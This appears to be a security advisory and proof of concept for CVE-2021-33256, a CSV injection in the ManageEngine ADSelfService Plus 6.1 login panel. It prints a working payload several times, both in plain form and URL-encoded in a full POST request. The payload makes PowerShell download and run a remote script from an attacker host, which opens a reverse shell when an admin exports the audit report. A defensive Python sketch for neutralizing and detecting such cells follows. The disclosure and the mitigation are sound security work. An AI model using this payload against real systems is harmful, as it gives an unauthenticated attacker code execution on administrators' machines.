# ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

### # Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService that can be exploited by an unauthenticated user. The `j_username` parameter seems to be vulnerable, and a reverse shell could be obtained if a privileged user exports the *"User Attempts Audit Report"* as a CSV file.

{% code title="Payload:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0
```

{% endcode %}

### # Proof Of Concept

**1-** A malicious user sends a POST request to the login page `https://TARGET-IP/j_security_check` and sets the `j_username` parameter to the payload above.

{% code title="j\_username parameter:" %}

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
```

{% endcode %}

![](/files/-M_Hd80_mGdnuCpsXmEz)

{% code title="POST Request:" %}

```
POST /j_security_check HTTP/1.1
Host: 192.168.1.253:9251
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: https://192.168.1.253:9251
Connection: close
Referer: https://192.168.1.253:9251/j_security_check
Cookie: *
Upgrade-Insecure-Requests: 1

j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28
```

{% endcode %}

The login attempt is saved to the *"User Attempts Audit Report"* table under the *Reports > Audit Reports* section. URL: `https://TARGET-IP/webclient/index.html#/reports/listReports/12`

The `j_username` parameter value is saved to the *"User Name"* column, which is the start of the line in the CSV file:

```
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')'
```

**2-** A PowerShell command that sends a reverse shell to the attacker machine is embedded in the last line of the `Invoke-PowerShellTcp.ps1` file.

![](/files/-M_Hdm82W7S5j24idP85)

**3-** If an admin user exports this table as a CSV file and confirms the alert popup, the malicious user obtains a reverse shell connection.

![Exporting User Attempts Audit Report as CSV file](/files/-M_Hdfk8dtkLXiSQ1xX1)

![Confirmation for Starting Another Application](/files/-M_HgxXQHVXrioNdm5A8)

![Exported CSV file](/files/-M_Hh9213DUVogbg2RiQ)

![Getting Reverse Shell](/files/-M_HhDy80hcV0m5F5YfM)
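The export step above is where the stored `j_username` value becomes dangerous, so that is where it has to be neutralized. The following is an added example, not code from the original advisory or from ManageEngine: a sketch of the output-side mitigation described on the OWASP CSV Injection page referenced below, plus a check that flags formula-like user names already present in audit rows. The column names other than "User Name", the sample rows, and all function names are assumptions made for illustration.

```python
import csv
import io

# Leading characters that make spreadsheet applications evaluate a cell
# (the set listed on the OWASP CSV Injection page).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True if a spreadsheet could interpret the cell as a formula."""
    text = "" if value is None else str(value)
    # Conservative choice (assumption): ignore leading spaces before checking.
    return text.lstrip(" ").startswith(FORMULA_TRIGGERS)


def neutralize_cell(value):
    """Return the cell as text, prefixed with ' when it looks like a formula."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_audit_csv(rows, header):
    """Write rows as CSV with every field quoted and every cell neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\r\n")
    writer.writerow(header)
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def flag_formula_usernames(rows, user_col=0):
    """Detection helper: audit rows whose user name starts like a formula."""
    return [row for row in rows if is_formula_like(row[user_col])]


# Constructed sample data (hypothetical columns, documentation IP addresses).
HEADER = ["User Name", "Client IP", "Status"]
SAMPLE_ROWS = [
    ["jsmith", "192.0.2.10", "Invalid password"],
    ["=cmd|'/C placeholder'!A0", "192.0.2.66", "Invalid user"],
    ["@SUM(1+1)", "192.0.2.67", "Invalid user"],
]

if __name__ == "__main__":
    print(export_audit_csv(SAMPLE_ROWS, HEADER))
    for row in flag_formula_usernames(SAMPLE_ROWS):
        print("suspicious login attempt:", row)
```

Neutralizing at export time keeps the stored audit data unchanged for forensics, while `flag_formula_usernames` gives responders a quick way to find attempts like the one in step 1 in existing records.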

{% embed url="<https://nvd.nist.gov/vuln/detail/CVE-2021-33256>" %}

{% embed url="<https://www.exploit-db.com/exploits/49885>" %}

```
# Author: Metin Yunus Kandemir
```

### # Reference

{% embed url="<https://owasp.org/www-community/attacks/CSV_Injection>" %}

{% embed url="<https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1>" %}

